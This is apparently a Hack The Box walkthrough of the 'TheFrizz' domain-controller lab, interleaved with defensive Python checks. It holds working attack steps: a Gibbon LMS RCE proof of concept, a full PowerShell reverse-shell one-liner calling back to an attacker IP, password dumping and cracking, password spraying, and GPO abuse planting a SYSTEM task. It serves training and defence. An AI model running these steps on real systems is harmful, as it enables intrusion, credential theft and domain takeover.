TheFrizzler - HTB Walkthrough & Advanced SecOps Notes

Target IP: 10.129.232.168
Domain: frizz.htb
DC Hostname: frizzdc.frizz.htb
OS: Windows Server 2022 (Domain Controller)
Difficulty: Hard
Author: [Your Name/Handle]


1. Phase 1: Reconnaissance & Information Gathering

1.1 TCP Port Discovery

We begin by identifying all open ports. Using --min-rate 10000 speeds up the scan significantly but can occasionally drop packets on unstable connections.

# -p-: Scan all ports (1-65535)
# --min-rate 10000: Set minimum packets per second to 10k for speed
# -oA nmap/FullPorts: Save results in all three major formats
nmap -p- --min-rate 10000 10.129.232.168 -oA nmap/FullPorts 

Port Analysis & Attack Surface Mapping

  • 22/tcp (SSH): Running OpenSSH for_Windows_9.5. This is a prime target for later persistence once we have credentials.
  • 53/tcp (DNS): Simple DNS Plus. Standard on Windows AD environments.
  • 80/tcp (HTTP): Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12. Hosting Gibbon LMS.
  • 88/tcp (Kerberos): Used for ticket-based authentication. Essential for Kerberoasting or AS-REP roasting.
  • 135/tcp (MSRPC): Windows Remote Procedure Call. Useful for enumeration via rpcdump.
  • 389/tcp (LDAP): Active Directory directory services. Source for user/group enumeration.
  • 445/tcp (SMB): Microsoft-DS. Target for smbclient, crackmapexec, and potential relay attacks.
  • 593/tcp (RPC-over-HTTP): RPC endpoint mapper over HTTP, used for remote management; part of the RPC surface that BloodHound collectors enumerate.
  • 636/tcp (LDAPS): Secure LDAP.
  • 3268/3269 (Global Catalog): Extended LDAP for forest-wide searches.
  • 9389 (ADWS): Active Directory Web Services.

1.2 Targeted Service Scanning

With the ports identified, we run aggressive service detection.

# -A: OS detection, Version detection, Script scanning, and Traceroute
# -T5: Aggressive timing (safe for modern lab environments)
# -oA nmap/TheFrizz: Output results
nmap -A -T5 10.129.232.168 -oA nmap/TheFrizz

Critical Findings:

  1. HTTP Redirect: Port 80 redirects to http://frizzdc.frizz.htb/home/. This confirms the FQDN.
  2. DNS Name: The domain is explicitly identified as frizz.htb.
  3. Clock Skew: Nmap reports a skew of 6h59m59s. This is a show-stopper for Kerberos authentication, which by default tolerates at most 5 minutes of deviation between client and KDC. We must fix this before using getTGT.py or ssh -K.
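A quick way to turn that Nmap value into a go/no-go decision before any Kerberos tooling is run, added here as an example (not part of the original walkthrough): it parses Nmap's clock-skew notation into seconds and compares it with the 300-second tolerance Kerberos applies by default. The Nmap excerpt is constructed to mirror the value reported above.

```python
import re

# Kerberos clients and KDCs reject tickets whose timestamps differ from local time by more
# than this many seconds; 300 s (5 minutes) is the default for both Windows and MIT Kerberos.
MAX_CLOCK_SKEW_SECONDS = 300

_UNIT_SECONDS = {"d": 86400, "h": 3600, "m": 60, "s": 1}
_DURATION_RE = re.compile(r"^(-?)((?:\d+[dhms])+)$")


def parse_nmap_skew(text: str) -> int:
    """Convert an Nmap clock-skew value such as '6h59m59s' or '-1s' into signed seconds."""
    m = _DURATION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised duration: {text!r}")
    sign = -1 if m.group(1) else 1
    total = sum(int(n) * _UNIT_SECONDS[u] for n, u in re.findall(r"(\d+)([dhms])", m.group(2)))
    return sign * total


def assess_skew(text: str, tolerance: int = MAX_CLOCK_SKEW_SECONDS) -> dict:
    """Decide whether Kerberos will accept our clock, and name the error we would see otherwise."""
    seconds = parse_nmap_skew(text)
    ok = abs(seconds) <= tolerance
    return {
        "skew_seconds": seconds,
        "within_tolerance": ok,
        "expected_error": None if ok else "KRB_AP_ERR_SKEW",
        "action": None if ok else "sync the clock to the DC before requesting tickets",
    }


def skew_from_nmap_output(output: str) -> list:
    """Pull every clock-skew value out of an Nmap text report (plain or 'mean:' form) and assess it."""
    values = re.findall(r"clock-skew:\s*(?:mean:\s*)?(-?[\dhms]+)", output)
    return [assess_skew(v) for v in values]


# Constructed Nmap excerpt (not the real scan output), mirroring the skew reported above.
SAMPLE_NMAP = """Host script results:
| smb2-time:
|   date: 2025-01-01T19:00:00
|_  start_date: N/A
|_clock-skew: 6h59m59s
"""

if __name__ == "__main__":
    for result in skew_from_nmap_output(SAMPLE_NMAP):
        print(result)
```

Run it against the saved `nmap/TheFrizz.nmap` text and anything outside tolerance is the reason a later `getTGT.py` or `ssh -K` would fail with KRB_AP_ERR_SKEW.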

1.3 Local Host Resolution

Update your /etc/hosts file to ensure the web application and Kerberos tools can resolve the domain.

# Add this entry to /etc/hosts
10.129.232.168 frizzdc.frizz.htb frizz.htb

2. Phase 2: Vulnerability Analysis & Web Exploitation

2.1 Enumerating Gibbon LMS

Visiting the site reveals Gibbon LMS v25.0.00. Researching this version leads to CVE-2023-45878.

Vulnerability Detail:

  • CVE-2023-45878: This is an authenticated RCE. It allows an attacker to bypass file upload restrictions or exploit unsafe handling of PHP functions within the application’s administrative interface.
  • PoC Source: davidzzo23/CVE-2023-45878

2.2 Exploitation: Remote Code Execution

The exploit script requires a target URL and can execute commands directly.

# Clone the repository
git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
 
# Test connectivity and execution
python CVE-2023-45878.py -t frizzdc.frizz.htb -c "whoami"
# Expected Output: nt authority\system (or the web service account, e.g., frizz\apache)

2.3 Upgrading to a Reverse Shell

Manual shells are more stable. We will use a Base64-encoded PowerShell payload to avoid character-escaping issues.

Step 1: Create the Payload

Use a Nishang one-liner or a standard PowerShell TCP client.

# Simple PowerShell TCP one-liner, built on the Kali side in bash (the $ signs of the
# PowerShell variables are escaped so bash leaves them alone; LHOST/LPORT are substituted)
LHOST="10.10.16.149"
LPORT="4444"
code="\$client = New-Object System.Net.Sockets.TCPClient(\"$LHOST\",$LPORT);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()"
 
# Convert to UTF-16LE and Base64 (the format -enc expects); -n keeps a trailing newline out of the blob
echo -n "$code" | iconv -t UTF-16LE | base64 -w0

Step 2: Catch and Execute

# Start Listener
rlwrap nc -lvnp 4444
 
# Execute Exploit
python CVE-2023-45878.py -t frizzdc.frizz.htb -c "powershell -enc [BASE64_BLOB]"

3. Phase 3: Post-Exploitation & Data Exfiltration

3.1 Database Credential Recovery

Web applications often store high-privilege database credentials in configuration files.

# Locate the configuration file
cd C:\xampp\htdocs\Gibbon-LMS\
type config.php

Captured Credentials:

  • $databaseUsername = 'MrGibbonsDB';
  • $databasePassword = 'MisterGibbs!Parrot!?1';

3.2 Dumping the MySQL Database

With direct access to the mysql binary, we can dump user hashes.

# Navigate to MySQL bin
cd C:\xampp\mysql\bin
 
# List tables to find the user table
.\mysql.exe -uMrGibbonsDB -p"MisterGibbs!Parrot!?1" gibbon -e "show tables"
 
# Dump user details
# Using \G ensures each row is printed vertically, preventing line wrapping in small shells.
.\mysql.exe -uMrGibbonsDB -p"MisterGibbs!Parrot!?1" gibbon -e "select username, passwordStrong, passwordStrongSalt from gibbonperson \G"

Extracted Hash (f.frizzle):

  • User: f.frizzle
  • Hash: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03
  • Salt: /aACFhikmNopqrRTVz2489

3.3 Hash Cracking (Hashcat)

Gibbon LMS stores a single-round SHA-256 of a per-user salt concatenated with the password, so each guess costs exactly one hash operation.

# Format: hash:salt (Salted SHA256)
echo "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489" > f_frizzle.hash
 
# Mode 1420: sha256($salt.$pass); Gibbon prepends the salt, so this is the order that matches
hashcat -m 1420 f_frizzle.hash /usr/share/wordlists/rockyou.txt

Cracked Password: Jenni_Luvs_Magic23
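To make the hash format concrete, here is an added example (my code, not Gibbon's or the walkthrough's) that reproduces Gibbon's passwordStrong computation, salt first then password (hashcat mode 1420), audits a table dump for accounts still on that single-round scheme, and shows the PBKDF2-based storage a defender would migrate to. The rows and passwords are constructed; nothing from the target is reused, and the PBKDF2 record format is my own choice.

```python
import hashlib
import hmac
import os

# Gibbon LMS stores passwordStrong = hex(sha256(passwordStrongSalt + password)) next to
# passwordStrongSalt in gibbonperson. Salt first, then password: that is hashcat mode 1420,
# sha256($salt.$pass). Mode 1410, sha256($pass.$salt), would never match a Gibbon row.


def gibbon_hash(password: str, salt: str) -> str:
    """Reproduce Gibbon's passwordStrong value for a given salt and password."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def verify_gibbon(password: str, salt: str, stored_hex: str) -> bool:
    """Constant-time check of a password against a passwordStrong/passwordStrongSalt pair."""
    return hmac.compare_digest(gibbon_hash(password, salt), stored_hex.lower())


def audit_gibbon_rows(rows) -> list:
    """Return usernames whose stored hash is still a single-round SHA-256 (64 hex chars).

    One SHA-256 per guess is what makes the hashcat run above cheap; an administrator
    should force these accounts through a re-hash on their next login."""
    hexdigits = set("0123456789abcdef")
    return [
        r["username"] for r in rows
        if len(r["passwordStrong"]) == 64 and set(r["passwordStrong"].lower()) <= hexdigits
    ]


# The storage a defender would want instead: PBKDF2-HMAC-SHA256 from the standard library,
# with the iteration count stored alongside so it can be raised later without a format change.
PBKDF2_ITERATIONS = 600_000


def pbkdf2_store(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    scheme, iterations, salt_hex, dk_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed sample rows (not the target's data): one legacy Gibbon row, one migrated row.
# The low iteration count on the migrated row only keeps this demo fast.
SAMPLE_SALT = "constructedSalt123"
SAMPLE_ROWS = [
    {"username": "legacy.user", "passwordStrong": gibbon_hash("Example!Pass1", SAMPLE_SALT),
     "passwordStrongSalt": SAMPLE_SALT},
    {"username": "migrated.user", "passwordStrong": pbkdf2_store("Example!Pass2", 10_000),
     "passwordStrongSalt": ""},
]

if __name__ == "__main__":
    print("accounts still on single-round SHA-256:", audit_gibbon_rows(SAMPLE_ROWS))
    print("verify (salt.pass):", verify_gibbon("Example!Pass1", SAMPLE_SALT, SAMPLE_ROWS[0]["passwordStrong"]))
```

Swapping the concatenation order is the difference between hashcat modes 1410 and 1420; `gibbon_hash("a", "b")` and `gibbon_hash("b", "a")` differ, which is why a wrong mode silently exhausts the wordlist.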


4. Phase 4: Lateral Movement

4.1 Syncing Time for Kerberos

As noted in the reconnaissance phase, we must sync our attack machine’s clock with the DC.

# Disable local NTP sync
sudo timedatectl set-ntp false
 
# Force sync with FrizzDC
sudo ntpdate -s frizzdc.frizz.htb
 
# Verify time
date

4.2 Attaining a Kerberos TGT

Using Impacket’s getTGT.py, we can request a Ticket Granting Ticket.

# Request TGT
getTGT.py frizz.htb/f.frizzle:Jenni_Luvs_Magic23
 
# Export the ccache file for use with other tools
export KRB5CCNAME=f.frizzle.ccache

4.3 SSH Access via Kerberos

We can now log in via SSH using the Kerberos ticket (GSSAPI).

# -K: Enables GSSAPI authentication
ssh -K f.frizzle@frizzdc.frizz.htb

5. Phase 5: Forensics & Further Enumeration

5.1 Recycle Bin Inspection

The Recycle Bin often contains deleted configuration files or installer logs. Each user has a unique folder based on their SID.

# List Recycle Bin contents
cd 'C:\$RECYCLE.BIN'
gci -force
 
# Access f.frizzle's recycle folder (Check SID via 'whoami /user')
cd 'S-1-5-21-2386970044-1145388522-2932701813-1103'
gci -force

Found: wapt.7z

5.2 Exfiltrating wapt.7z

If SCP is blocked, we can use the web server to download the file.

# Move file to Apache webroot
cp wapt.7z C:\xampp\htdocs\home\wapt.7z
# Download from Kali
wget http://frizzdc.frizz.htb/home/wapt.7z

5.3 Analyzing WAPT Configuration

WAPT (Windows APT-get) is a software management tool. Its configuration often contains administrative passwords.

# Extract the archive
7z x wapt.7z
 
# Inspect the ini file
grep password conf/waptserver.ini
# Found: wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
 
# Decode Base64
echo "IXN1QmNpZ0BNZWhUZWQhUgo=" | base64 -d
# Password: !suBcig@MehTed!R

6. Phase 6: Domain Escalation via GPO Abuse

6.1 Password Spraying

We need to find which account the !suBcig@MehTed!R password belongs to.

# 1. Enumerate all domain users
nxc smb frizzdc.frizz.htb -k -u f.frizzle -p Jenni_Luvs_Magic23 --users | awk '{print $5}' > users.txt
 
# 2. Spray the discovered password
nxc smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' --continue-on-success

Match Found: M.SchoolBus
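The spray above leaves a distinctive footprint in the DC's Security log: many different account names failing from one source in a short window, then a success. The detection below, added as an example (not from the walkthrough), runs that logic over a constructed tab-separated excerpt using event IDs 4771/4625 for failures and 4768/4624 for successes. The field layout, window and threshold are my assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Windows Security event IDs. 4771 (Kerberos pre-auth failed) is what a spray produces against
# a Kerberos-only DC; 4625 (logon failure) covers NTLM attempts; 4768/4624 are successes.
FAILURE_EVENTS = {"4771", "4625"}
SUCCESS_EVENTS = {"4768", "4624"}

# Constructed log excerpt (not from the target): ISO time, EventID, account, source IP,
# tab-separated. One source tries five accounts in ten seconds and then gets a TGT for a
# sixth; a second source is a user mistyping their own password twice.
SAMPLE_EVENTS = """\
2025-01-01T19:00:00\t4771\tuser01\t192.0.2.10
2025-01-01T19:00:02\t4771\tuser02\t192.0.2.10
2025-01-01T19:00:04\t4771\tuser03\t192.0.2.10
2025-01-01T19:00:06\t4771\tuser04\t192.0.2.10
2025-01-01T19:00:08\t4771\tuser05\t192.0.2.10
2025-01-01T19:00:10\t4768\tuser06\t192.0.2.10
2025-01-01T19:05:00\t4771\talice\t192.0.2.55
2025-01-01T19:05:30\t4771\talice\t192.0.2.55
2025-01-01T19:06:00\t4768\talice\t192.0.2.55
"""


def parse_events(text: str) -> list:
    events = []
    for line in text.strip().splitlines():
        ts, event_id, account, source = line.split("\t")
        events.append({"time": datetime.fromisoformat(ts), "event_id": event_id,
                       "account": account.lower(), "source": source})
    return sorted(events, key=lambda e: e["time"])


def detect_spray(events: list, window: timedelta = timedelta(minutes=2), min_accounts: int = 5) -> list:
    """Flag a source that fails against >= min_accounts distinct accounts inside one window.

    Many accounts, one or two attempts each is the spray signature; a brute force against a
    single account keeps the distinct-account count at 1 and belongs to a different rule."""
    by_source = defaultdict(list)
    for e in events:
        by_source[e["source"]].append(e)
    alerts = []
    for source, evs in by_source.items():
        failures = [e for e in evs if e["event_id"] in FAILURE_EVENTS]
        start = 0
        for end in range(len(failures)):
            # Slide the window so it spans at most `window` of time.
            while failures[end]["time"] - failures[start]["time"] > window:
                start += 1
            in_window = failures[start:end + 1]
            accounts = {e["account"] for e in in_window}
            if len(accounts) < min_accounts:
                continue
            first = in_window[0]["time"]
            # A success from the same source after the spray began is the account to reset first.
            succeeded = sorted({e["account"] for e in evs
                               if e["event_id"] in SUCCESS_EVENTS and e["time"] >= first})
            alerts.append({"source": source, "first": first, "last": in_window[-1]["time"],
                           "accounts": sorted(accounts), "succeeded_after": succeeded})
            break  # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The same rule works on exported EVTX data once the four fields are pulled out of the event XML; the `succeeded_after` list is the set of accounts a responder would disable or reset first.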

6.2 Bloodhound Analysis

Running BloodHound.py or RustHound as M.SchoolBus reveals a critical path:

  • M.SchoolBus is a member of Group Policy Creator Owners.
  • This group has the right to create new GPOs and link them to OUs where they have Write or AllExtendedRights.

6.3 GPO Creation & Linking

We will create a new GPO and link it to the Domain Controllers OU.

# Create the GPO
New-GPO -Name "MaliciousPolicy"
 
# Link it to the Domain Controllers OU
# This ensures it runs on the DC as SYSTEM
New-GPLink -Name "MaliciousPolicy" -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB"

6.4 Injecting Malicious Tasks (SharpGPOAbuse)

SharpGPOAbuse.exe is a C# tool designed to modify GPOs to execute code.

# Host the tool on Kali
python3 -m http.server 80
# Download to Target
iwr http://10.10.16.149/SharpGPOAbuse.exe -OutFile Sharp.exe
 
# Add a scheduled task to the GPO
# --addcomputertask: Creates a task that runs as SYSTEM on the computer
# --TaskName: A benign-looking name
# --Command: Binary to run
# --Arguments: Our Base64 reverse shell payload
.\Sharp.exe --addcomputertask --GPOName "MaliciousPolicy" --Author "Administrator" --TaskName "SecurityUpdate" --Command "powershell.exe" --Arguments "-enc [BASE64_PAYLOAD]"

6.5 Forcing Policy Update

By default, Group Policy refreshes in the background every 90 minutes. We can force an immediate refresh.

# Force update
gpupdate /force

7. Phase 7: Final Flag Recovery

7.1 Catching SYSTEM Shell

# Catch the incoming connection
rlwrap nc -lvnp 5555
# Verify Identity
whoami
# nt authority\system
 
# Locate Flags
type C:\Users\Administrator\Desktop\root.txt
type C:\Users\f.frizzle\Desktop\user.txt

7.2 Cleanup

To avoid leaving a mess on the shared lab machine (the HTB box), remove the malicious GPO once finished.

Remove-GPO -Name "MaliciousPolicy"

Appendix: Common Troubleshooting

Issue                               Resolution
Kerberos error KRB_AP_ERR_SKEW      Sync time using ntpdate against the DC.
PowerShell shell dies               Use rlwrap and ensure no special characters are in the -enc blob.
SharpGPOAbuse fails                 Ensure the GPO is actually linked to the correct OU.
SMB login fails                     Check whether SMB signing is required (Nmap output).

Deep Dive: How GPO Abuse Works

Group Policy Objects are stored in the SYSVOL share of the Domain Controller. When we use SharpGPOAbuse, it modifies the GptTmpl.inf (for user rights) or ScheduledTasks.xml (for tasks) inside the GPO folder.

  1. Modification: The tool writes to \\frizz.htb\SYSVOL\frizz.htb\Policies\{GPO_GUID}\....
  2. Notification: The change increments the GPO version number; clients compare it against the version they last applied and re-process the GPO when it differs.
  3. Application: The gpupdate process (or the periodic refresh) on the target machine pulls the new XML/INF file, and the Task Scheduler registers and runs the defined task.
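What this looks like from the defender's side: the file that ends up in SYSVOL under Policies\{GPO_GUID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml can be audited directly. The triage script below is an added example, not code from the walkthrough or from SharpGPOAbuse; its sample XML is constructed in the Group Policy Preferences layout (an assumption about the exact fields the tool writes), and the encoded command inside it is a harmless Write-Output so the decoder has something to show.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Location of the file this audits, per GPO (Group Policy Preferences layout):
#   \\<domain>\SYSVOL\<domain>\Policies\{GPO_GUID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml

# Script hosts and LOLBins whose appearance as a GPO-pushed task command deserves a second look.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# PowerShell accepts abbreviations of -EncodedCommand; match the common prefixes.
ENC_FLAG_RE = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(arguments: str):
    """Return the plaintext of a -EncodedCommand argument (Base64 of UTF-16LE), or None."""
    m = ENC_FLAG_RE.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def audit_scheduled_tasks(xml_text: str) -> list:
    """Score every task in a GPP ScheduledTasks.xml; a higher score means more reasons to inspect."""
    findings = []
    for task in ET.fromstring(xml_text):  # ImmediateTaskV2, TaskV2, ImmediateTask, Task
        props = task.find("Properties")
        if props is None:
            continue
        exec_node = props.find("./Task/Actions/Exec")
        command = exec_node.findtext("Command", "").strip() if exec_node is not None else ""
        arguments = exec_node.findtext("Arguments", "").strip() if exec_node is not None else ""
        run_as = props.get("runAs", "")
        reasons = []
        if task.tag.startswith("Immediate"):
            reasons.append("immediate task: runs once at the next policy refresh, not on a schedule")
        if "system" in run_as.lower():
            reasons.append(f"runs as {run_as}")
        if command.lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
            reasons.append(f"script host or LOLBin as the command: {command}")
        decoded = decode_encoded_command(arguments)
        if decoded is not None:
            reasons.append("Base64-encoded PowerShell command in the arguments")
        findings.append({
            "task": task.get("name"), "type": task.tag, "run_as": run_as,
            "command": command, "arguments": arguments,
            "decoded_command": decoded, "reasons": reasons, "score": len(reasons),
        })
    return findings


# Constructed sample in the GPP layout (an assumption about the exact fields SharpGPOAbuse
# writes; the uid is a placeholder). The encoded payload is a harmless Write-Output.
_SAMPLE_ENCODED = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
SAMPLE_SCHEDULED_TASKS_XML = """<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="SecurityUpdate" image="0"
                   changed="2025-01-01 19:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="C" name="SecurityUpdate" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Principals>
          <Principal id="Author">
            <UserId>NT AUTHORITY\\System</UserId>
            <RunLevel>HighestAvailable</RunLevel>
          </Principal>
        </Principals>
        <Actions Context="Author">
          <Exec>
            <Command>powershell.exe</Command>
            <Arguments>-enc ENCODED_PLACEHOLDER</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
""".replace("ENCODED_PLACEHOLDER", _SAMPLE_ENCODED)

if __name__ == "__main__":
    for f in audit_scheduled_tasks(SAMPLE_SCHEDULED_TASKS_XML):
        print(f["score"], f["task"], f["reasons"], "->", f["decoded_command"])
```

Pair the file audit with the directory-service change events on the DC (5137 for the new GPO object, 5136 for the gPLink modification on the Domain Controllers OU) and with object-access auditing on the SYSVOL Policies folder; a freshly created GPO whose only content is an immediate task running as SYSTEM with an encoded command is worth a look whatever name it was given.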

Deep Dive: Gibbon LMS RCE (CVE-2023-45878)

The vulnerability lies in the System Settings module where an administrator can define paths or system commands. By manipulating the input in the System Check or External Tools configuration, an attacker can escape the intended command and inject arbitrary PHP. The PoC automates the login and the injection of a PHP web shell into a reachable directory.


Deep Dive: WAPT Forensics

WAPT is a “Windows APT-get” equivalent. It uses a local service to manage packages.

  • wapt-get.ini: Contains the global configuration.
  • waptserver.ini: Contains the server-side credentials if the machine acts as a repository or management node.
  • Key security flaw: in early versions the passwords were stored in these configuration files in plaintext or as plain Base64 so that the service could authenticate to the central repository; Base64 is an encoding, not protection.
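Both credential finds on this box (config.php in 3.1 and waptserver.ini in 5.3) come from the same weakness: secrets kept in configuration files either in the clear or merely Base64-encoded. The scanner below is an added example (not from the walkthrough or from WAPT) that walks constructed snippets shaped like both files, flags secret-bearing keys, and decodes Base64 values to show that encoding hides nothing; the key-name heuristics are my assumptions and the sample values are made up.

```python
import base64
import re
import string

# Keys whose values are likely to be secrets. Heuristic and my assumption; extend per application.
SECRET_KEY_RE = re.compile(r"(?i)(pass(word|wd)?|pwd|secret|token|api_?key)")
# One assignment per line, covering PHP ($databasePassword = 'x';) and INI (wapt_password = x).
ASSIGNMENT_RE = re.compile(r"^\s*\$?(?P<key>[A-Za-z_][A-Za-z0-9_]*)\s*=\s*(?P<value>.+?)\s*;?\s*$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


def unquote(value: str) -> str:
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
        return value[1:-1]
    return value


def decode_if_base64(value: str):
    """Return the decoded text if value is Base64 wrapping printable text, else None.

    A plaintext password made only of Base64 characters can slip through as plaintext;
    that is the accepted trade-off of a heuristic."""
    if not B64_RE.match(value) or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if text and all(c in string.printable for c in text):
        return text.rstrip("\r\n")
    return None


def mask(value: str) -> str:
    """Masked form for reports, so the finding can be shared without re-leaking the secret."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def scan_config(filename: str, text: str) -> list:
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith(("#", ";", "//")):
            continue
        m = ASSIGNMENT_RE.match(line)
        if not m or not SECRET_KEY_RE.search(m.group("key")):
            continue
        value = unquote(m.group("value"))
        if not value:
            continue
        decoded = decode_if_base64(value)
        findings.append({
            "file": filename, "line": lineno, "key": m.group("key"),
            "encoding": "base64" if decoded is not None else "plaintext",
            "secret": decoded if decoded is not None else value,
            "masked": mask(value),
        })
    return findings


# Constructed snippets (not the target's files), shaped like the two files found on this box.
SAMPLE_CONFIG_PHP = """<?php
$databaseServer = 'localhost';
$databaseUsername = 'app_user';
$databasePassword = 'C0nstructed!Example';
$guid = '00000000-0000-0000-0000-000000000000';
"""
_SAMPLE_B64 = base64.b64encode(b"constructed-example-secret\n").decode()
SAMPLE_WAPTSERVER_INI = f"""[options]
wapt_user = admin
wapt_password = {_SAMPLE_B64}
allow_unauthenticated_registration = True
"""


def scan_all() -> list:
    return scan_config("config.php", SAMPLE_CONFIG_PHP) + scan_config("waptserver.ini", SAMPLE_WAPTSERVER_INI)


if __name__ == "__main__":
    for f in scan_all():
        print(f"{f['file']}:{f['line']} {f['key']} [{f['encoding']}] {f['masked']}")
```

The fix on either side is the same: move the secret out of the web-readable tree into a secrets store or a file readable only by the service account, and treat a Base64 value in a config file as plaintext when assessing exposure.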